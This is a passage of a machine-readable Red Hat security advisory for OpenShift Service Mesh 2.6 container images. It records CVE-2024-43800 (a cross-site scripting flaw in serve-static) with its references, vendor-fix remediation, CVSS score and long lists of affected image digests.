"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", 